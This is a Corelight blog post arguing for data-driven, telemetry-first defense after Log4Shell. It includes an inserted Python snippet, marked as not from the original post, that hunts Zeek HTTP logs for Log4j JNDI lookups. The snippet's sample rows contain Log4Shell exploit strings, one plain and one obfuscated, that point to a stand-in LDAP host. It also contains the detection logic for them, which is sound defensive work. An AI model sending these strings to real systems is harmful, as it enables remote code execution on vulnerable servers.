Security strategy for the next Log4Shell

Last week I had the privilege to be in Washington, DC talking to a group of defenders. I heard a clear pattern of words: “data-driven,” “telemetry-first,” and “visibility”. The defenders were focused on having the right telemetry to investigate both routine incidents and advanced attacks, because (1) while they can add analytics later, they can’t recreate the DATA that those analytics depend on, and (2) better coverage reduces the attacker’s ability to maneuver without hitting defensive telemetry. The defender’s dilemma (adversaries only have to get it right once) becomes the attacker’s dilemma (defenders only have to find one of their moves).

Then Log4Shell happened, which follows Sunburst as a prime example of why leading defenders pursue data-driven strategies. With such a wide range of exploit paths in Log4Shell, there is no one “detection.” The winning approach directly detects the most common exploit paths and then relies on data - both in its raw form and fed into multiple, evolving analytics - to expose the new and less common exploit paths. More importantly, defenders can look back in time and see exploits that happened prior to disclosure. Without the right data, you are blind.
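As an added illustration, not code from this post or from Corelight, here is a small Python hunt over constructed Zeek http.log rows: it collapses nested `${...}` lookups before checking for a JNDI lookup (so one literal pattern is not the whole detection) and flags hits that predate a chosen disclosure cut-off, which is the retroactive look-back the post describes. The four-column row layout, the sample values and the cut-off date are assumptions for brevity.

```python
import re
from datetime import datetime, timezone

# Constructed Zeek http.log rows, reduced to ts, uid, id.orig_h, user_agent.
# Addresses and uids are made up; a real hunt would also scan other headers/URI.
SAMPLE_HTTP_LOG = """\
1638316800.000\tCAbc1\t203.0.113.5\tMozilla/5.0
1638576000.000\tCAbc2\t203.0.113.9\t${jndi:ldap://example.invalid/a}
1639180800.000\tCAbc3\t198.51.100.7\t${${lower:j}ndi:${lower:l}dap://example.invalid/b}
1639267200.000\tCAbc4\t198.51.100.8\t${date:yyyy} curl/7.79.1
"""

# Example cut-off: public disclosure date, 2021-12-10 UTC (assumed for the demo).
DISCLOSURE_TS = datetime(2021, 12, 10, tzinfo=timezone.utc).timestamp()

LOOKUP = re.compile(r"\$\{([^{}]*)\}")  # innermost ${...} lookups


def normalize_lookups(s: str, max_rounds: int = 50) -> str:
    """Heuristically resolve lookups nested inside other lookups.

    A nested ${prefix:value} is replaced by its value (text after the last
    ':' with a leading '-' default marker stripped). Top-level lookups are kept
    so the caller can inspect them. This is a simplification of Log4j lookup
    semantics, enough to expose the canonical form of a JNDI lookup."""
    for _ in range(max_rounds):
        changed = False
        for m in LOOKUP.finditer(s):
            prefix = s[: m.start()]
            if prefix.count("${") > prefix.count("}"):  # inside an open lookup
                inner = m.group(1).rsplit(":", 1)[-1].lstrip("-")
                s = s[: m.start()] + inner + s[m.end():]
                changed = True
                break
        if not changed:
            break
    return s


def find_jndi_lookups(text: str) -> list:
    """Return the bodies of top-level lookups that resolve to jndi:... ."""
    s = normalize_lookups(text)
    return [m.group(1) for m in LOOKUP.finditer(s) if m.group(1).lower().startswith("jndi:")]


def hunt(log_text: str, disclosure_ts: float) -> list:
    """Scan rows; each hit records the lookup and whether it predates disclosure."""
    hits = []
    for row in log_text.splitlines():
        if not row or row.startswith("#"):
            continue
        ts, uid, orig_h, ua = row.split("\t")
        found = find_jndi_lookups(ua)
        if found:
            hits.append({"ts": float(ts), "uid": uid, "orig_h": orig_h,
                         "lookup": found[0], "pre_disclosure": float(ts) < disclosure_ts})
    return hits
```

Running `hunt(SAMPLE_HTTP_LOG, DISCLOSURE_TS)` returns two hits, the first flagged as pre-disclosure; the benign `${date:yyyy}` row is not flagged.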

We see four elements of this strategy:

  1. Measure what matters. The three key metrics are mean time to respond, coverage of MITRE TTPs through the combination of network and endpoint telemetry, and breadth of environmental coverage (i.e. ensuring that the entire enterprise is covered, not just key portions of it). All of this work must extend backwards in time as long as possible - 7 days of PCAP or 30 days of logs are insufficient.
  2. Use standards. Bespoke telemetry sources are hard to map to new-hire skills, hard to integrate, and hard to analyze. By using open standards such as Zeek, which Corelight was first built on, you simplify the entire analysis stack by using existing industry-driven turnkey integrations. We see this in the Log4Shell response, where Zeek-based analytics come from companies ranging from Splunk to BlackHills, whose integration of detection and telemetry provides cleaner and easier responses.
  3. Do your own reconnaissance: know your own network, so you can quickly pivot to potential anomalies with an understanding of what is normal (i.e. baselined). For some organizations this is a dedicated threat hunting function, for others this can be part of a person’s time each week. Either way, it is an investment in insight and agility.
  4. Train, train, train. Great data is only as good as the people using it. Corelight (and others like Splunk) provide well-structured CTF exercises. However, it is critically important to give analysts time after the training to put that to use, for example, with threat hunting assignments. Doing so helps the analyst understand their environment much better, accelerating future investigations.

With so many rushing to address the latest vulnerability, our investigation and remediation work today has to address the crisis at hand. However, leaders need to look at the implications of Log4Shell to better equip our teams for the next battle. Never waste a good crisis! Follow the lead of elite defenders and adopt data-driven security as a key pillar of your 2022 strategy.

By Brian Dye, CEO of Corelight 
